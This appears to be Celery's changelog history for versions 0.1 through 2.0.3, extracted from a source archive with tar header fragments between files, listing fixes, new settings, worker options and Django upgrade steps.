:ref:`FAQ ` for more information. * Task errors are now logged using log level `ERROR` instead of `INFO`, and stack-traces are dumped. Thanks to Grégoire Cachet. * Make every new worker process re-establish it's Django DB connection, this solving the "MySQL connection died?" exceptions. Thanks to Vitaly Babiy and Jirka Vejrazka. * **IMPORTANT** Now using pickle to encode task arguments. This means you now can pass complex Python objects to tasks as arguments. * Removed dependency to `yadayada`. * Added a FAQ, see `docs/faq.rst`. * Now converts any Unicode keys in task `kwargs` to regular strings. Thanks Vitaly Babiy. * Renamed the `TaskDaemon` to `WorkController`. * `celery.datastructures.TaskProcessQueue` is now renamed to `celery.pool.TaskPool`. * The pool algorithm has been refactored for greater performance and stability. .. _version-0.2.0: 0.2.0 ===== :release-date: 2009-05-20 05:14 p.m. CET :release-by: Ask Solem * Final release of 0.2.0 * Compatible with carrot version 0.4.0. * Fixes some syntax errors related to fetching results from the database backend. .. _version-0.2.0-pre3: 0.2.0-pre3 ========== :release-date: 2009-05-20 05:14 p.m. CET :release-by: Ask Solem * *Internal release*. Improved handling of unpickleable exceptions, `get_result` now tries to recreate something looking like the original exception. .. _version-0.2.0-pre2: 0.2.0-pre2 ========== :release-date: 2009-05-20 01:56 p.m. CET :release-by: Ask Solem * Now handles unpickleable exceptions (like the dynamically generated subclasses of `django.core.exception.MultipleObjectsReturned`). .. _version-0.2.0-pre1: 0.2.0-pre1 ========== :release-date: 2009-05-20 12:33 p.m. CET :release-by: Ask Solem * It's getting quite stable, with a lot of new features, so bump version to 0.2. This is a pre-release. * `celery.task.mark_as_read()` and `celery.task.mark_as_failure()` has been removed. Use `celery.backends.default_backend.mark_as_read()`, and `celery.backends.default_backend.mark_as_failure()` instead. .. _version-0.1.15: 0.1.15 ====== :release-date: 2009-05-19 04:13 p.m. CET :release-by: Ask Solem * The Celery daemon was leaking AMQP connections, this should be fixed, if you have any problems with too many files open (like `emfile` errors in `rabbit.log`, please contact us! .. _version-0.1.14: 0.1.14 ====== :release-date: 2009-05-19 01:08 p.m. CET :release-by: Ask Solem * Fixed a syntax error in the `TaskSet` class (no such variable `TimeOutError`). .. _version-0.1.13: 0.1.13 ====== :release-date: 2009-05-19 12:36 p.m. CET :release-by: Ask Solem * Forgot to add `yadayada` to install requirements. * Now deletes all expired task results, not just those marked as done. * Able to load the Tokyo Tyrant backend class without django configuration, can specify tyrant settings directly in the class constructor. * Improved API documentation * Now using the Sphinx documentation system, you can build the html documentation by doing: .. code-block:: console $ cd docs $ make html and the result will be in `docs/_build/html`. .. _version-0.1.12: 0.1.12 ====== :release-date: 2009-05-18 04:38 p.m. CET :release-by: Ask Solem * `delay_task()` etc. now returns `celery.task.AsyncResult` object, which lets you check the result and any failure that might've happened. It kind of works like the `multiprocessing.AsyncResult` class returned by `multiprocessing.Pool.map_async`. * Added ``dmap()`` and ``dmap_async()``. This works like the `multiprocessing.Pool` versions except they're tasks distributed to the Celery server. Example: .. code-block:: pycon >>> from celery.task import dmap >>> import operator >>> dmap(operator.add, [[2, 2], [4, 4], [8, 8]]) >>> [4, 8, 16] >>> from celery.task import dmap_async >>> import operator >>> result = dmap_async(operator.add, [[2, 2], [4, 4], [8, 8]]) >>> result.ready() False >>> time.sleep(1) >>> result.ready() True >>> result.result [4, 8, 16] * Refactored the task meta-data cache and database backends, and added a new backend for Tokyo Tyrant. You can set the backend in your django settings file. Example: .. code-block:: python CELERY_RESULT_BACKEND = 'database'; # Uses the database CELERY_RESULT_BACKEND = 'cache'; # Uses the django cache framework CELERY_RESULT_BACKEND = 'tyrant'; # Uses Tokyo Tyrant TT_HOST = 'localhost'; # Hostname for the Tokyo Tyrant server. TT_PORT = 6657; # Port of the Tokyo Tyrant server. .. _version-0.1.11: 0.1.11 ====== :release-date: 2009-05-12 02:08 p.m. CET :release-by: Ask Solem * The logging system was leaking file descriptors, resulting in servers stopping with the EMFILES (too many open files) error (fixed). .. _version-0.1.10: 0.1.10 ====== :release-date: 2009-05-11 12:46 p.m. CET :release-by: Ask Solem * Tasks now supports both positional arguments and keyword arguments. * Requires carrot 0.3.8. * The daemon now tries to reconnect if the connection is lost. .. _version-0.1.8: 0.1.8 ===== :release-date: 2009-05-07 12:27 p.m. CET :release-by: Ask Solem * Better test coverage * More documentation * The worker doesn't emit `Queue is empty` message if `settings.CELERYD_EMPTY_MSG_EMIT_EVERY` is 0. .. _version-0.1.7: 0.1.7 ===== :release-date: 2009-04-30 01:50 p.m. CET :release-by: Ask Solem * Added some unit tests * Can now use the database for task meta-data (like if the task has been executed or not). Set `settings.CELERY_TASK_META` * Can now run `python setup.py test` to run the unit tests from within the `tests` project. * Can set the AMQP exchange/routing key/queue using `settings.CELERY_AMQP_EXCHANGE`, `settings.CELERY_AMQP_ROUTING_KEY`, and `settings.CELERY_AMQP_CONSUMER_QUEUE`. .. _version-0.1.6: 0.1.6 ===== :release-date: 2009-04-28 02:13 p.m. CET :release-by: Ask Solem * Introducing `TaskSet`. A set of subtasks is executed and you can find out how many, or if all them, are done (excellent for progress bars and such) * Now catches all exceptions when running `Task.__call__`, so the daemon doesn't die. This doesn't happen for pure functions yet, only `Task` classes. * `autodiscover()` now works with zipped eggs. * Worker: Now adds current working directory to `sys.path` for convenience. * The `run_every` attribute of `PeriodicTask` classes can now be a `datetime.timedelta()` object. * Worker: You can now set the `DJANGO_PROJECT_DIR` variable for the worker and it will add that to `sys.path` for easy launching. * Can now check if a task has been executed or not via HTTP. * You can do this by including the Celery `urls.py` into your project, >>> url(r'^celery/$', include('celery.urls')) then visiting the following URL: .. code-block:: text http://mysite/celery/$task_id/done/ this will return a JSON dictionary, for example: .. code-block:: json {"task": {"id": "TASK_ID", "executed": true}} * `delay_task` now returns string id, not `uuid.UUID` instance. * Now has `PeriodicTasks`, to have `cron` like functionality. * Project changed name from `crunchy` to `celery`. The details of the name change request is in `docs/name_change_request.txt`. .. _version-0.1.0: 0.1.0 ===== :release-date: 2009-04-24 11:28 a.m. CET :release-by: Ask Solem * Initial release Sphinx started sucking by removing images from _static, so we need to add them here into actual content to ensure they are included :-( .. image:: ../images/celery-banner.png .. image:: ../images/celery-banner-small.png ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-2.0.rst0000664000175000017500000010233600000000000020311 0ustar00asifasif00000000000000.. _changelog-2.0: =============================== Change history for Celery 2.0 =============================== .. contents:: :local: .. _version-2.0.3: 2.0.3 ===== :release-date: 2010-08-27 12:00 p.m. CEST :release-by: Ask Solem .. _v203-fixes: Fixes ----- * Worker: Properly handle connection errors happening while closing consumers. * Worker: Events are now buffered if the connection is down, then sent when the connection is re-established. * No longer depends on the :pypi:`mailer` package. This package had a name space collision with `django-mailer`, so its functionality was replaced. * Redis result backend: Documentation typos: Redis doesn't have database names, but database numbers. The default database is now 0. * :class:`~celery.task.control.inspect`: `registered_tasks` was requesting an invalid command because of a typo. See issue #170. * :setting:`CELERY_ROUTES`: Values defined in the route should now have precedence over values defined in :setting:`CELERY_QUEUES` when merging the two. With the follow settings: .. code-block:: python CELERY_QUEUES = {'cpubound': {'exchange': 'cpubound', 'routing_key': 'cpubound'}} CELERY_ROUTES = {'tasks.add': {'queue': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json'}} The final routing options for `tasks.add` will become: .. code-block:: python {'exchange': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json'} This wasn't the case before: the values in :setting:`CELERY_QUEUES` would take precedence. * Worker crashed if the value of :setting:`CELERY_TASK_ERROR_WHITELIST` was not an iterable * :func:`~celery.execute.apply`: Make sure `kwargs['task_id']` is always set. * `AsyncResult.traceback`: Now returns :const:`None`, instead of raising :exc:`KeyError` if traceback is missing. * :class:`~celery.task.control.inspect`: Replies didn't work correctly if no destination was specified. * Can now store result/meta-data for custom states. * Worker: A warning is now emitted if the sending of task error emails fails. * ``celeryev``: Curses monitor no longer crashes if the terminal window is resized. See issue #160. * Worker: On macOS it isn't possible to run `os.exec*` in a process that's threaded. This breaks the SIGHUP restart handler, and is now disabled on macOS, emitting a warning instead. See issue #152. * :mod:`celery.execute.trace`: Properly handle `raise(str)`, which is still allowed in Python 2.4. See issue #175. * Using urllib2 in a periodic task on macOS crashed because of the proxy auto detection used in macOS. This is now fixed by using a workaround. See issue #143. * Debian init-scripts: Commands shouldn't run in a sub shell See issue #163. * Debian init-scripts: Use the absolute path of ``celeryd`` program to allow stat See issue #162. .. _v203-documentation: Documentation ------------- * getting-started/broker-installation: Fixed typo `set_permissions ""` -> `set_permissions ".*"`. * Tasks User Guide: Added section on database transactions. See issue #169. * Routing User Guide: Fixed typo `"feed": -> {"queue": "feeds"}`. See issue #169. * Documented the default values for the :setting:`CELERYD_CONCURRENCY` and :setting:`CELERYD_PREFETCH_MULTIPLIER` settings. * Tasks User Guide: Fixed typos in the subtask example * celery.signals: Documented worker_process_init. * Daemonization cookbook: Need to export DJANGO_SETTINGS_MODULE in `/etc/default/celeryd`. * Added some more FAQs from stack overflow * Daemonization cookbook: Fixed typo `CELERYD_LOGFILE/CELERYD_PIDFILE` to `CELERYD_LOG_FILE` / `CELERYD_PID_FILE` Also added troubleshooting section for the init-scripts. .. _version-2.0.2: 2.0.2 ===== :release-date: 2010-07-22 11:31 a.m. CEST :release-by: Ask Solem * Routes: When using the dict route syntax, the exchange for a task could disappear making the task unroutable. See issue #158. * Test suite now passing on Python 2.4 * No longer have to type `PYTHONPATH=.` to use ``celeryconfig`` in the current directory. This is accomplished by the default loader ensuring that the current directory is in `sys.path` when loading the config module. `sys.path` is reset to its original state after loading. Adding the current working directory to `sys.path` without the user knowing may be a security issue, as this means someone can drop a Python module in the users directory that executes arbitrary commands. This was the original reason not to do this, but if done *only when loading the config module*, this means that the behavior will only apply to the modules imported in the config module, which I think is a good compromise (certainly better than just explicitly setting `PYTHONPATH=.` anyway) * Experimental Cassandra backend added. * Worker: SIGHUP handler accidentally propagated to worker pool processes. In combination with :sha:`7a7c44e39344789f11b5346e9cc8340f5fe4846c` this would make each child process start a new worker instance when the terminal window was closed :/ * Worker: Don't install SIGHUP handler if running from a terminal. This fixes the problem where the worker is launched in the background when closing the terminal. * Worker: Now joins threads at shutdown. See issue #152. * Test tear down: Don't use `atexit` but nose's `teardown()` functionality instead. See issue #154. * Debian worker init-script: Stop now works correctly. * Task logger: `warn` method added (synonym for `warning`) * Can now define a white list of errors to send error emails for. Example: .. code-block:: python CELERY_TASK_ERROR_WHITELIST = ('myapp.MalformedInputError',) See issue #153. * Worker: Now handles overflow exceptions in `time.mktime` while parsing the ETA field. * LoggerWrapper: Try to detect loggers logging back to stderr/stdout making an infinite loop. * Added :class:`celery.task.control.inspect`: Inspects a running worker. Examples: .. code-block:: pycon # Inspect a single worker >>> i = inspect('myworker.example.com') # Inspect several workers >>> i = inspect(['myworker.example.com', 'myworker2.example.com']) # Inspect all workers consuming on this vhost. >>> i = inspect() ### Methods # Get currently executing tasks >>> i.active() # Get currently reserved tasks >>> i.reserved() # Get the current ETA schedule >>> i.scheduled() # Worker statistics and info >>> i.stats() # List of currently revoked tasks >>> i.revoked() # List of registered tasks >>> i.registered_tasks() * Remote control commands `dump_active`/`dump_reserved`/`dump_schedule` now replies with detailed task requests. Containing the original arguments and fields of the task requested. In addition the remote control command `set_loglevel` has been added, this only changes the log level for the main process. * Worker control command execution now catches errors and returns their string representation in the reply. * Functional test suite added :mod:`celery.tests.functional.case` contains utilities to start and stop an embedded worker process, for use in functional testing. .. _version-2.0.1: 2.0.1 ===== :release-date: 2010-07-09 03:02 p.m. CEST :release-by: Ask Solem * multiprocessing.pool: Now handles encoding errors, so that pickling errors doesn't crash the worker processes. * The remote control command replies wasn't working with RabbitMQ 1.8.0's stricter equivalence checks. If you've already hit this problem you may have to delete the declaration: .. code-block:: console $ camqadm exchange.delete celerycrq or: .. code-block:: console $ python manage.py camqadm exchange.delete celerycrq * A bug sneaked in the ETA scheduler that made it only able to execute one task per second(!) The scheduler sleeps between iterations so it doesn't consume too much CPU. It keeps a list of the scheduled items sorted by time, at each iteration it sleeps for the remaining time of the item with the nearest deadline. If there are no ETA tasks it will sleep for a minimum amount of time, one second by default. A bug sneaked in here, making it sleep for one second for every task that was scheduled. This has been fixed, so now it should move tasks like hot knife through butter. In addition a new setting has been added to control the minimum sleep interval; :setting:`CELERYD_ETA_SCHEDULER_PRECISION`. A good value for this would be a float between 0 and 1, depending on the needed precision. A value of 0.8 means that when the ETA of a task is met, it will take at most 0.8 seconds for the task to be moved to the ready queue. * Pool: Supervisor didn't release the semaphore. This would lead to a deadlock if all workers terminated prematurely. * Added Python version trove classifiers: 2.4, 2.5, 2.6 and 2.7 * Tests now passing on Python 2.7. * Task.__reduce__: Tasks created using the task decorator can now be pickled. * :file:`setup.py`: :pypi:`nose` added to `tests_require`. * Pickle should now work with SQLAlchemy 0.5.x * New homepage design by Jan Henrik Helmers: http://celeryproject.org * New Sphinx theme by Armin Ronacher: http://docs.celeryproject.org/ * Fixed "pending_xref" errors shown in the HTML rendering of the documentation. Apparently this was caused by new changes in Sphinx 1.0b2. * Router classes in :setting:`CELERY_ROUTES` are now imported lazily. Importing a router class in a module that also loads the Celery environment would cause a circular dependency. This is solved by importing it when needed after the environment is set up. * :setting:`CELERY_ROUTES` was broken if set to a single dict. This example in the docs should now work again: .. code-block:: python CELERY_ROUTES = {'feed.tasks.import_feed': 'feeds'} * `CREATE_MISSING_QUEUES` wasn't honored by apply_async. * New remote control command: `stats` Dumps information about the worker, like pool process ids, and total number of tasks executed by type. Example reply: .. code-block:: python [{'worker.local': 'total': {'tasks.sleeptask': 6}, 'pool': {'timeouts': [None, None], 'processes': [60376, 60377], 'max-concurrency': 2, 'max-tasks-per-child': None, 'put-guarded-by-semaphore': True}}] * New remote control command: `dump_active` Gives a list of tasks currently being executed by the worker. By default arguments are passed through repr in case there are arguments that's not JSON encodable. If you know the arguments are JSON safe, you can pass the argument `safe=True`. Example reply: .. code-block:: pycon >>> broadcast('dump_active', arguments={'safe': False}, reply=True) [{'worker.local': [ {'args': '(1,)', 'time_start': 1278580542.6300001, 'name': 'tasks.sleeptask', 'delivery_info': { 'consumer_tag': '30', 'routing_key': 'celery', 'exchange': 'celery'}, 'hostname': 'casper.local', 'acknowledged': True, 'kwargs': '{}', 'id': '802e93e9-e470-47ed-b913-06de8510aca2', } ]}] * Added experimental support for persistent revokes. Use the `-S|--statedb` argument to the worker to enable it: .. code-block:: console $ celeryd --statedb=/var/run/celeryd This will use the file: `/var/run/celeryd.db`, as the `shelve` module automatically adds the `.db` suffix. .. _version-2.0.0: 2.0.0 ===== :release-date: 2010-07-02 02:30 p.m. CEST :release-by: Ask Solem Foreword -------- Celery 2.0 contains backward incompatible changes, the most important being that the Django dependency has been removed so Celery no longer supports Django out of the box, but instead as an add-on package called :pypi:`django-celery`. We're very sorry for breaking backwards compatibility, but there's also many new and exciting features to make up for the time you lose upgrading, so be sure to read the :ref:`News ` section. Quite a lot of potential users have been upset about the Django dependency, so maybe this is a chance to get wider adoption by the Python community as well. Big thanks to all contributors, testers and users! .. _v200-django-upgrade: Upgrading for Django-users -------------------------- Django integration has been moved to a separate package: :pypi:`django-celery`. * To upgrade you need to install the :pypi:`django-celery` module and change: .. code-block:: python INSTALLED_APPS = 'celery' to: .. code-block:: python INSTALLED_APPS = 'djcelery' * If you use `mod_wsgi` you need to add the following line to your `.wsgi` file: .. code-block:: python import os os.environ['CELERY_LOADER'] = 'django' * The following modules has been moved to :pypi:`django-celery`: ===================================== ===================================== **Module name** **Replace with** ===================================== ===================================== `celery.models` `djcelery.models` `celery.managers` `djcelery.managers` `celery.views` `djcelery.views` `celery.urls` `djcelery.urls` `celery.management` `djcelery.management` `celery.loaders.djangoapp` `djcelery.loaders` `celery.backends.database` `djcelery.backends.database` `celery.backends.cache` `djcelery.backends.cache` ===================================== ===================================== Importing :mod:`djcelery` will automatically setup Celery to use Django loader. loader. It does this by setting the :envvar:`CELERY_LOADER` environment variable to `"django"` (it won't change it if a loader is already set). When the Django loader is used, the "database" and "cache" result backend aliases will point to the :mod:`djcelery` backends instead of the built-in backends, and configuration will be read from the Django settings. .. _v200-upgrade: Upgrading for others -------------------- .. _v200-upgrade-database: Database result backend ~~~~~~~~~~~~~~~~~~~~~~~ The database result backend is now using `SQLAlchemy`_ instead of the Django ORM, see `Supported Databases`_ for a table of supported databases. The `DATABASE_*` settings has been replaced by a single setting: :setting:`CELERY_RESULT_DBURI`. The value here should be an `SQLAlchemy Connection String`_, some examples include: .. code-block:: python # sqlite (filename) CELERY_RESULT_DBURI = 'sqlite:///celerydb.sqlite' # mysql CELERY_RESULT_DBURI = 'mysql://scott:tiger@localhost/foo' # postgresql CELERY_RESULT_DBURI = 'postgresql://scott:tiger@localhost/mydatabase' # oracle CELERY_RESULT_DBURI = 'oracle://scott:tiger@127.0.0.1:1521/sidname' See `SQLAlchemy Connection Strings`_ for more information about connection strings. To specify additional SQLAlchemy database engine options you can use the :setting:`CELERY_RESULT_ENGINE_OPTIONS` setting: .. code-block:: python # echo enables verbose logging from SQLAlchemy. CELERY_RESULT_ENGINE_OPTIONS = {'echo': True} .. _`SQLAlchemy`: http://www.sqlalchemy.org .. _`Supported Databases`: http://www.sqlalchemy.org/docs/core/engines.html#supported-databases .. _`SQLAlchemy Connection String`: http://www.sqlalchemy.org/docs/core/engines.html#database-urls .. _`SQLAlchemy Connection Strings`: http://www.sqlalchemy.org/docs/core/engines.html#database-urls .. _v200-upgrade-cache: Cache result backend ~~~~~~~~~~~~~~~~~~~~ The cache result backend is no longer using the Django cache framework, but it supports mostly the same configuration syntax: .. code-block:: python CELERY_CACHE_BACKEND = 'memcached://A.example.com:11211;B.example.com' To use the cache backend you must either have the :pypi:`pylibmc` or :pypi:`python-memcached` library installed, of which the former is regarded as the best choice. The support backend types are `memcached://` and `memory://`, we haven't felt the need to support any of the other backends provided by Django. .. _v200-incompatible: Backward incompatible changes ----------------------------- * Default (python) loader now prints warning on missing `celeryconfig.py` instead of raising :exc:`ImportError`. The worker raises :exc:`~@ImproperlyConfigured` if the configuration isn't set up. This makes it possible to use `--help` etc., without having a working configuration. Also this makes it possible to use the client side of Celery without being configured: .. code-block:: pycon >>> from carrot.connection import BrokerConnection >>> conn = BrokerConnection('localhost', 'guest', 'guest', '/') >>> from celery.execute import send_task >>> r = send_task('celery.ping', args=(), kwargs={}, connection=conn) >>> from celery.backends.amqp import AMQPBackend >>> r.backend = AMQPBackend(connection=conn) >>> r.get() 'pong' * The following deprecated settings has been removed (as scheduled by the :ref:`deprecation-timeline`): ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== `CELERY_AMQP_CONSUMER_QUEUES` `CELERY_QUEUES` `CELERY_AMQP_EXCHANGE` `CELERY_DEFAULT_EXCHANGE` `CELERY_AMQP_EXCHANGE_TYPE` `CELERY_DEFAULT_EXCHANGE_TYPE` `CELERY_AMQP_CONSUMER_ROUTING_KEY` `CELERY_QUEUES` `CELERY_AMQP_PUBLISHER_ROUTING_KEY` `CELERY_DEFAULT_ROUTING_KEY` ===================================== ===================================== * The `celery.task.rest` module has been removed, use `celery.task.http` instead (as scheduled by the :ref:`deprecation-timeline`). * It's no longer allowed to skip the class name in loader names. (as scheduled by the :ref:`deprecation-timeline`): Assuming the implicit `Loader` class name is no longer supported, for example, if you use: .. code-block:: python CELERY_LOADER = 'myapp.loaders' You need to include the loader class name, like this: .. code-block:: python CELERY_LOADER = 'myapp.loaders.Loader' * :setting:`CELERY_TASK_RESULT_EXPIRES` now defaults to 1 day. Previous default setting was to expire in 5 days. * AMQP backend: Don't use different values for `auto_delete`. This bug became visible with RabbitMQ 1.8.0, which no longer allows conflicting declarations for the auto_delete and durable settings. If you've already used Celery with this backend chances are you have to delete the previous declaration: .. code-block:: console $ camqadm exchange.delete celeryresults * Now uses pickle instead of cPickle on Python versions <= 2.5 cPickle is broken in Python <= 2.5. It unsafely and incorrectly uses relative instead of absolute imports, so for example: .. code-block:: python exceptions.KeyError becomes: .. code-block:: python celery.exceptions.KeyError Your best choice is to upgrade to Python 2.6, as while the pure pickle version has worse performance, it is the only safe option for older Python versions. .. _v200-news: News ---- * **celeryev**: Curses Celery Monitor and Event Viewer. This is a simple monitor allowing you to see what tasks are executing in real-time and investigate tracebacks and results of ready tasks. It also enables you to set new rate limits and revoke tasks. Screenshot: .. figure:: ../images/celeryevshotsm.jpg If you run `celeryev` with the `-d` switch it will act as an event dumper, simply dumping the events it receives to standard out: .. code-block:: console $ celeryev -d -> celeryev: starting capture... casper.local [2010-06-04 10:42:07.020000] heartbeat casper.local [2010-06-04 10:42:14.750000] task received: tasks.add(61a68756-27f4-4879-b816-3cf815672b0e) args=[2, 2] kwargs={} eta=2010-06-04T10:42:16.669290, retries=0 casper.local [2010-06-04 10:42:17.230000] task started tasks.add(61a68756-27f4-4879-b816-3cf815672b0e) args=[2, 2] kwargs={} casper.local [2010-06-04 10:42:17.960000] task succeeded: tasks.add(61a68756-27f4-4879-b816-3cf815672b0e) args=[2, 2] kwargs={} result=4, runtime=0.782663106918 The fields here are, in order: *sender hostname*, *timestamp*, *event type* and *additional event fields*. * AMQP result backend: Now supports `.ready()`, `.successful()`, `.result`, `.status`, and even responds to changes in task state * New user guides: * :ref:`guide-workers` * :ref:`guide-canvas` * :ref:`guide-routing` * Worker: Standard out/error is now being redirected to the log file. * :pypi:`billiard` has been moved back to the Celery repository. ===================================== ===================================== **Module name** **celery equivalent** ===================================== ===================================== `billiard.pool` `celery.concurrency.processes.pool` `billiard.serialization` `celery.serialization` `billiard.utils.functional` `celery.utils.functional` ===================================== ===================================== The :pypi:`billiard` distribution may be maintained, depending on interest. * now depends on :pypi:`carrot` >= 0.10.5 * now depends on :pypi:`pyparsing` * Worker: Added `--purge` as an alias to `--discard`. * Worker: :kbd:`Control-c` (SIGINT) once does warm shutdown, hitting :kbd:`Control-c` twice forces termination. * Added support for using complex Crontab-expressions in periodic tasks. For example, you can now use: .. code-block:: pycon >>> crontab(minute='*/15') or even: .. code-block:: pycon >>> crontab(minute='*/30', hour='8-17,1-2', day_of_week='thu-fri') See :ref:`guide-beat`. * Worker: Now waits for available pool processes before applying new tasks to the pool. This means it doesn't have to wait for dozens of tasks to finish at shutdown because it has applied prefetched tasks without having any pool processes available to immediately accept them. See issue #122. * New built-in way to do task callbacks using :class:`~celery.subtask`. See :ref:`guide-canvas` for more information. * TaskSets can now contain several types of tasks. :class:`~celery.task.sets.TaskSet` has been refactored to use a new syntax, please see :ref:`guide-canvas` for more information. The previous syntax is still supported, but will be deprecated in version 1.4. * TaskSet failed() result was incorrect. See issue #132. * Now creates different loggers per task class. See issue #129. * Missing queue definitions are now created automatically. You can disable this using the :setting:`CELERY_CREATE_MISSING_QUEUES` setting. The missing queues are created with the following options: .. code-block:: python CELERY_QUEUES[name] = {'exchange': name, 'exchange_type': 'direct', 'routing_key': 'name} This feature is added for easily setting up routing using the `-Q` option to the worker: .. code-block:: console $ celeryd -Q video, image See the new routing section of the User Guide for more information: :ref:`guide-routing`. * New Task option: `Task.queue` If set, message options will be taken from the corresponding entry in :setting:`CELERY_QUEUES`. `exchange`, `exchange_type` and `routing_key` will be ignored * Added support for task soft and hard time limits. New settings added: * :setting:`CELERYD_TASK_TIME_LIMIT` Hard time limit. The worker processing the task will be killed and replaced with a new one when this is exceeded. * :setting:`CELERYD_TASK_SOFT_TIME_LIMIT` Soft time limit. The :exc:`~@SoftTimeLimitExceeded` exception will be raised when this is exceeded. The task can catch this to, for example, clean up before the hard time limit comes. New command-line arguments to ``celeryd`` added: `--time-limit` and `--soft-time-limit`. What's left? This won't work on platforms not supporting signals (and specifically the `SIGUSR1` signal) yet. So an alternative the ability to disable the feature all together on nonconforming platforms must be implemented. Also when the hard time limit is exceeded, the task result should be a `TimeLimitExceeded` exception. * Test suite is now passing without a running broker, using the carrot in-memory backend. * Log output is now available in colors. ===================================== ===================================== **Log level** **Color** ===================================== ===================================== `DEBUG` Blue `WARNING` Yellow `CRITICAL` Magenta `ERROR` Red ===================================== ===================================== This is only enabled when the log output is a tty. You can explicitly enable/disable this feature using the :setting:`CELERYD_LOG_COLOR` setting. * Added support for task router classes (like the django multi-db routers) * New setting: :setting:`CELERY_ROUTES` This is a single, or a list of routers to traverse when sending tasks. Dictionaries in this list converts to a :class:`celery.routes.MapRoute` instance. Examples: >>> CELERY_ROUTES = {'celery.ping': 'default', 'mytasks.add': 'cpu-bound', 'video.encode': { 'queue': 'video', 'exchange': 'media' 'routing_key': 'media.video.encode'}} >>> CELERY_ROUTES = ('myapp.tasks.Router', {'celery.ping': 'default'}) Where `myapp.tasks.Router` could be: .. code-block:: python class Router(object): def route_for_task(self, task, args=None, kwargs=None): if task == 'celery.ping': return 'default' route_for_task may return a string or a dict. A string then means it's a queue name in :setting:`CELERY_QUEUES`, a dict means it's a custom route. When sending tasks, the routers are consulted in order. The first router that doesn't return `None` is the route to use. The message options is then merged with the found route settings, where the routers settings have priority. Example if :func:`~celery.execute.apply_async` has these arguments: .. code-block:: pycon >>> Task.apply_async(immediate=False, exchange='video', ... routing_key='video.compress') and a router returns: .. code-block:: python {'immediate': True, 'exchange': 'urgent'} the final message options will be: .. code-block:: pycon >>> task.apply_async( ... immediate=True, ... exchange='urgent', ... routing_key='video.compress', ... ) (and any default message options defined in the :class:`~celery.task.base.Task` class) * New Task handler called after the task returns: :meth:`~celery.task.base.Task.after_return`. * :class:`~billiard.einfo.ExceptionInfo` now passed to :meth:`~celery.task.base.Task.on_retry`/ :meth:`~celery.task.base.Task.on_failure` as ``einfo`` keyword argument. * Worker: Added :setting:`CELERYD_MAX_TASKS_PER_CHILD` / ``celery worker --maxtasksperchild``. Defines the maximum number of tasks a pool worker can process before the process is terminated and replaced by a new one. * Revoked tasks now marked with state :state:`REVOKED`, and `result.get()` will now raise :exc:`~@TaskRevokedError`. * :func:`celery.task.control.ping` now works as expected. * `apply(throw=True)` / :setting:`CELERY_EAGER_PROPAGATES_EXCEPTIONS`: Makes eager execution re-raise task errors. * New signal: :signal:`~celery.signals.worker_process_init`: Sent inside the pool worker process at init. * Worker: :option:`celery worker -Q` option: Ability to specify list of queues to use, disabling other configured queues. For example, if :setting:`CELERY_QUEUES` defines four queues: `image`, `video`, `data` and `default`, the following command would make the worker only consume from the `image` and `video` queues: .. code-block:: console $ celeryd -Q image,video * Worker: New return value for the `revoke` control command: Now returns: .. code-block:: python {'ok': 'task $id revoked'} instead of :const:`True`. * Worker: Can now enable/disable events using remote control Example usage: >>> from celery.task.control import broadcast >>> broadcast('enable_events') >>> broadcast('disable_events') * Removed top-level tests directory. Test config now in celery.tests.config This means running the unit tests doesn't require any special setup. `celery/tests/__init__` now configures the :envvar:`CELERY_CONFIG_MODULE` and :envvar:`CELERY_LOADER` environment variables, so when `nosetests` imports that, the unit test environment is all set up. Before you run the tests you need to install the test requirements: .. code-block:: console $ pip install -r requirements/test.txt Running all tests: .. code-block:: console $ nosetests Specifying the tests to run: .. code-block:: console $ nosetests celery.tests.test_task Producing HTML coverage: .. code-block:: console $ nosetests --with-coverage3 The coverage output is then located in `celery/tests/cover/index.html`. * Worker: New option `--version`: Dump version info and exit. * :mod:`celeryd-multi `: Tool for shell scripts to start multiple workers. Some examples: - Advanced example with 10 workers: * Three of the workers processes the images and video queue * Two of the workers processes the data queue with loglevel DEBUG * the rest processes the default' queue. .. code-block:: console $ celeryd-multi start 10 -l INFO -Q:1-3 images,video -Q:4,5:data -Q default -L:4,5 DEBUG - Get commands to start 10 workers, with 3 processes each .. code-block:: console $ celeryd-multi start 3 -c 3 celeryd -n celeryd1.myhost -c 3 celeryd -n celeryd2.myhost -c 3 celeryd -n celeryd3.myhost -c 3 - Start 3 named workers .. code-block:: console $ celeryd-multi start image video data -c 3 celeryd -n image.myhost -c 3 celeryd -n video.myhost -c 3 celeryd -n data.myhost -c 3 - Specify custom hostname .. code-block:: console $ celeryd-multi start 2 -n worker.example.com -c 3 celeryd -n celeryd1.worker.example.com -c 3 celeryd -n celeryd2.worker.example.com -c 3 Additional options are added to each ``celeryd``, but you can also modify the options for ranges of or single workers - 3 workers: Two with 3 processes, and one with 10 processes. .. code-block:: console $ celeryd-multi start 3 -c 3 -c:1 10 celeryd -n celeryd1.myhost -c 10 celeryd -n celeryd2.myhost -c 3 celeryd -n celeryd3.myhost -c 3 - Can also specify options for named workers .. code-block:: console $ celeryd-multi start image video data -c 3 -c:image 10 celeryd -n image.myhost -c 10 celeryd -n video.myhost -c 3 celeryd -n data.myhost -c 3 - Ranges and lists of workers in options is also allowed: (``-c:1-3`` can also be written as ``-c:1,2,3``) .. code-block:: console $ celeryd-multi start 5 -c 3 -c:1-3 10 celeryd-multi -n celeryd1.myhost -c 10 celeryd-multi -n celeryd2.myhost -c 10 celeryd-multi -n celeryd3.myhost -c 10 celeryd-multi -n celeryd4.myhost -c 3 celeryd-multi -n celeryd5.myhost -c 3 - Lists also work with named workers: .. code-block:: console $ celeryd-multi start foo bar baz xuzzy -c 3 -c:foo,bar,baz 10 celeryd-multi -n foo.myhost -c 10 celeryd-multi -n bar.myhost -c 10 celeryd-multi -n baz.myhost -c 10 celeryd-multi -n xuzzy.myhost -c 3 * The worker now calls the result backends `process_cleanup` method *after* task execution instead of before. * AMQP result backend now supports Pika. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-2.1.rst0000664000175000017500000005577600000000000020331 0ustar00asifasif00000000000000.. _changelog-2.1: =============================== Change history for Celery 2.1 =============================== .. contents:: :local: .. _version-2.1.4: 2.1.4 ===== :release-date: 2010-12-03 12:00 p.m. CEST :release-by: Ask Solem .. _v214-fixes: 